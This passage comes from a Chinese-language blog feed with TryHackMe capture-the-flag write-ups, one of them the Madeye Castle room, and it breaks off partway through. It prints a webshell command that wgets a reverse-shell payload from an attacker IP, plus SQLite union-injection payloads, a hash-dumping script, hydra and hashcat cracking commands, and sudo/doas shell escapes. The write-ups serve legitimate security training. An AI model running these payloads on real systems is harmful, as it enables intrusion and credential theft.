&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Origin&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;http://10.10.252.122:8085&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Connection&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;keep-alive&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Referer&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;http://10.10.252.122:8085/home&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Upgrade-Insecure-Requests&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;X-Remote-Addr&amp;#39;&lt;/span&gt; : &lt;span style="color:#f1fa8c"&gt;&amp;#39;127.0.0.1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;l &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; [i &lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; i &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;range&lt;/span&gt;(&lt;span style="color:#bd93f9"&gt;25000&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;def&lt;/span&gt; &lt;span style="color:#50fa7b"&gt;meow&lt;/span&gt;(num):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;number&amp;#39;&lt;/span&gt;: num
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;post(&lt;span style="color:#f1fa8c"&gt;&amp;#39;http://10.10.252.122:8085/home&amp;#39;&lt;/span&gt;, headers&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;headers, data&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; soup &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; BeautifulSoup(response&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text,&lt;span style="color:#f1fa8c"&gt;&amp;#39;html.parser&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; soup&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;find(&lt;span style="color:#f1fa8c"&gt;&amp;#39;h3&amp;#39;&lt;/span&gt;)&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;if&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Oh no!&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;not&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; s:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(num,s)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(soup , response&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;status_code)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;p &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; Pool(&lt;span style="color:#bd93f9"&gt;200&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;p&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;map(meow,l)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;幾秒鐘就爆出來ㄌ&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/70a7b-ovEpSKA.png"&gt;&lt;/li&gt;
&lt;li&gt;10921他回應我這個 &lt;code&gt;/YouGotTh3P@th/&lt;/code&gt;- 加到 80 port 的 Path 上面會出現一個 CMS- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ec855-G6gweDr.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="cms"&gt;CMS&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;發現他是 Mara CMS&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2a65a-pQKgc9o.png"&gt;&lt;/li&gt;
&lt;li&gt;預設可以用 &lt;code&gt;admin&lt;/code&gt; / &lt;code&gt;changeme&lt;/code&gt; 進行登入登入完還要我趕快改密碼- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/71e94-caUvVfd.png"&gt;查詢相關 Exploit- &lt;a href="https://www.exploit-db.com/exploits/48780"&gt;https://www.exploit-db.com/exploits/48780&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;目測是可以直接傳 webshell那就給他直接傳下去ㄅ- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/be110-TDlZejC.png"&gt;還真的可以- &lt;code&gt;http://10.10.252.122/YouGotTh3P@th/img/webshell.php?A=wget 10.13.21.55:8000/s -O /tmp/s&lt;/code&gt;戳 reverse shell&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7184c-7JTOmDY.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;python3 -c &amp;quot;import pty;pty.spawn('/bin/bash')&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;試著用 LSE&lt;code&gt;bash lse.sh -l1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;看不出什麼東西 QQ發現 find 指令被封鎖 QWQ- 提示說去找備份檔案&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c2e4e-gYLfB4Y.png"&gt;&lt;/li&gt;
&lt;li&gt;網路上看到兩種解法&lt;code&gt;tar cf - $PWD 2&amp;gt;/dev/null | tar tvf - | grep backup&lt;/code&gt;慢&lt;code&gt;du -a 2&amp;gt;/dev/null | grep backup&lt;/code&gt;- 快就找到了 &lt;code&gt;/usr/backups&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e7b00-amaWZB4.png"&gt;觀察發現有一個隱藏檔 &lt;code&gt;.bak.passwd&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/914b7-EgM00gS.png"&gt;&lt;/li&gt;
&lt;li&gt;解開來看&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4005c-RMkPPLY.png"&gt;獲得帳號密碼- &lt;code&gt;kiran&lt;/code&gt; / &lt;code&gt;trythispasswordforuserkiran&lt;/code&gt;透過 su 切過去- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/42aa8-PL9hiNi.png"&gt;取得 User Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4e450-B0lQJsK.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="二次提權"&gt;二次提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式 &lt;code&gt;sudo -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2fe2b-1L72E2i.png"&gt;使用豌豆- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/28f76-uhp6eWY.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有一個 &lt;code&gt;doas&lt;/code&gt; 酷指令，可以不用 suid 或 sudo去 GTFOBins 尋找 rsync to shell- &lt;a href="https://gtfobins.github.io/gtfobins/rsync/#suid"&gt;https://gtfobins.github.io/gtfobins/rsync/#suid&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;doas rsync -e 'sh -p -c &amp;quot;sh 0&amp;amp;2&amp;quot;' 127.0.0.1:/dev/null&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c19f3-AutD5Og.png"&gt;&lt;/li&gt;
&lt;li&gt;成功提權取得 Root Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cce12-ci2EuFY.png"&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Madeye Castle (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/23/madeye-castle-try-hack-me-writeup/</link><pubDate>Mon, 23 Aug 2021 13:06:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/23/madeye-castle-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/madeyescastle"&gt;https://tryhackme.com/room/madeyescastle&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.150.136&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 Port&lt;code&gt;rustscan -a 10.10.150.136 -r 1-65535&lt;/code&gt;Open 10.10.150.136:22&lt;/li&gt;
&lt;li&gt;Open 10.10.150.136:80&lt;/li&gt;
&lt;li&gt;Open 10.10.150.136:139&lt;/li&gt;
&lt;li&gt;Open 10.10.150.136:445&lt;code&gt;nmap -A -p22,80,139,445 10.10.150.136&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/98485-dfltW0w.png"&gt;掃路徑- &lt;code&gt;python3 dirsearch.py -u http://10.10.150.136&lt;/code&gt;backup/觀察首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/680e7-MmQ0A0U.png"&gt;&lt;/li&gt;
&lt;li&gt;比起 Apache Default Page 好像多了一個 Logo&lt;/li&gt;
&lt;li&gt;但是他死ㄌ嘗試 smb- &lt;code&gt;smbclient -N '//10.10.150.136/sambashare'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2ac48-ncyBB1i.png"&gt;匿名登入&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5e550-nVskJ4S.png"&gt;- 下載檔案&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/52cad-tFtDzwX.png"&gt;- 觀察檔案&lt;/li&gt;
&lt;li&gt;感覺很像某種字典檔&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cb791-ypxWY9H.png"&gt;- 另外一個檔案&lt;/li&gt;
&lt;li&gt;感覺有某些提示， Hagrid 可能用 rockyou 的密碼嘗試 Hydra 爆密碼- &lt;code&gt;hydra -L user.txt -P spellnames.txt hogwartz-castle.thm http-post-form &amp;quot;/login:user=^USER^&amp;amp;password=^PASS^:Incorrect Username or Password&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/db271-CwaK0bw.png"&gt;&lt;/li&gt;
&lt;li&gt;感覺很慢，沒效率，先放著丟一邊觀察首頁的註解- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2cf70-iiWqk7H.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來可以改 &lt;code&gt;/etc/hosts&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7be48-LR8qKGp.png"&gt;用 domain name 來訪問首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/81a90-QaO8nqV.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/26357-HkJdCpE.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來是可以輸入帳號密碼的頁面掃路徑- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c7cf3-ytCR8pJ.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來沒啥東西&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="sqli"&gt;SQLi&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;嘗試 SQLi亂輸入會噴 500 錯誤&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/62124-hC9IwLa.png"&gt;先複製 curl- &lt;code&gt;curl 'http://hogwartz-castle.thm/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://hogwartz-castle.thm' -H 'Connection: keep-alive' -H 'Referer: http://hogwartz-castle.thm/' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'user=aa&amp;amp;password=bb'&lt;/code&gt;可以戳 Union- &lt;code&gt;'union select 1,2,3,4 --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2363e-8oZED4R.png"&gt;測了一些 version 之類的東東都發現不行- 才發現他是 SQLite&lt;/li&gt;
&lt;li&gt;&amp;lsquo;union select sqlite_version(),2,3,4 &amp;ndash;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8d73a-JXv1VVk.png"&gt;SQLite 爆表- &lt;code&gt;'union select name,2,3,4 from sqlite_master WHERE type='table' --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/24e77-1S9UvKR.png"&gt;&lt;/li&gt;
&lt;li&gt;發現只有一張 users 的 table爆 Column- &lt;code&gt;'union select sql,2,3,4 from sqlite_master WHERE type='table' --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ac1d7-DboQSLP.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;name&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;password&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;admin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;notes&lt;/code&gt;選使用者- &lt;code&gt;'union select group_concat(name),2,3,4 from users --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/810d4-mRsktTI.png"&gt;選 admin- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5bf48-hg5rrk1.png"&gt;爆 使用者跟密碼組- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5f961-qPtZXaY.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; requests
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;headers &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;User-Agent&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept-Language&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;en-US,en;q=0.5&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Origin&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;http://hogwartz-castle.thm&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Connection&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;keep-alive&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Referer&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;http://hogwartz-castle.thm/login&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Upgrade-Insecure-Requests&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# &amp;#39;union select 1,2,3,4 --&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; i &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;range&lt;/span&gt;(&lt;span style="color:#bd93f9"&gt;1&lt;/span&gt;,&lt;span style="color:#bd93f9"&gt;40&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;user&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;f&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#34;&amp;#39;union select name || &amp;#39;:&amp;#39; || password,2,3,4 from users limit &lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;{&lt;/span&gt;i&lt;span style="color:#f1fa8c"&gt;}&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;,1 --&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;password&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;123&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;post(&lt;span style="color:#f1fa8c"&gt;&amp;#39;http://hogwartz-castle.thm/login&amp;#39;&lt;/span&gt;, headers&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;headers, data&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; response&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text[&lt;span style="color:#bd93f9"&gt;27&lt;/span&gt;:&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;19&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(name)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;取的所有的 hash&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cb950-G1a6hwW.png"&gt;分析 hash 格式- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9182d-H01hoQz.png"&gt;&lt;/li&gt;
&lt;li&gt;SHA 512用哈希貓- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c8036-GRYM30j.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hashcat -m 1700 hashes.txt spellnames.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hashcat -m 1700 hashes.txt /opt/rockyou.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現基本上都爆不出來觀察 notes- &lt;code&gt;'union select group_concat(notes),2,3,4 from users --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d4224-L5wm2pu.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6fd9f-z6bqT3d.png"&gt;發現密碼用ㄌ &lt;code&gt;best64&lt;/code&gt;查詢哈希貓 &lt;code&gt;best64&lt;/code&gt; 的用法- &lt;a href="https://github.com/hashcat/hashcat/blob/master/rules/best64.rule"&gt;https://github.com/hashcat/hashcat/blob/master/rules/best64.rule&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hashcat -m 1700 hashes.txt /opt/rockyou.txt -r best64.rule&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6531c-lYczWfH.png"&gt;&lt;/li&gt;
&lt;li&gt;成功爆出來密碼&lt;code&gt;b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885:wingardiumleviosa123&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/45eb7-fOnYTtK.png"&gt;回來用 SQLi 找使用者看看- &lt;code&gt;'user': &amp;quot;'union select name,2,3,4 from users where password like 'b326e7a6%' --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/72170-0xPvGbe.png"&gt;&lt;/li&gt;
&lt;li&gt;Harry Turner觀察他的 notes- &lt;code&gt;&amp;quot;'union select notes,2,3,4 from users where password like 'b326e7a6%' --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e7f01-FKMzlOs.png"&gt;&lt;/li&gt;
&lt;li&gt;使用 first name&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssh"&gt;SSH&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ssh harry@hogwartz-castle.thm&lt;/code&gt;密碼 ： &lt;code&gt;wingardiumleviosa123&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6586f-glQH9j0.png"&gt;&lt;/li&gt;
&lt;li&gt;登入成功&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1d84e-Ubpctjf.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;sudo -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9b297-9eydEcN.png"&gt;&lt;/li&gt;
&lt;li&gt;發現一個叫做 &lt;code&gt;pico&lt;/code&gt; 的程式&lt;/li&gt;
&lt;li&gt;可以用 &lt;code&gt;hermonine&lt;/code&gt; 執行 pico執行看看- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b1b77-zFhwVe6.png"&gt;&lt;/li&gt;
&lt;li&gt;發現打開是 nano尋找利用方式- &lt;a href="https://gtfobins.github.io/gtfobins/nano/#sudo"&gt;https://gtfobins.github.io/gtfobins/nano/#sudo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sudo -u hermonine /usr/bin/pico&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;^R^X&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;reset; sh 1&amp;gt;&amp;amp;0 2&amp;gt;&amp;amp;0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7fa08-Y0hDfkU.png"&gt;&lt;/li&gt;
&lt;li&gt;成功橫向移動成功取得 User Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1cc36-zBGBeAD.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="二次提權"&gt;二次提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;發現使用者根目錄有 &lt;code&gt;.python_history&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f0915-zdfCuju.png"&gt;&lt;/li&gt;
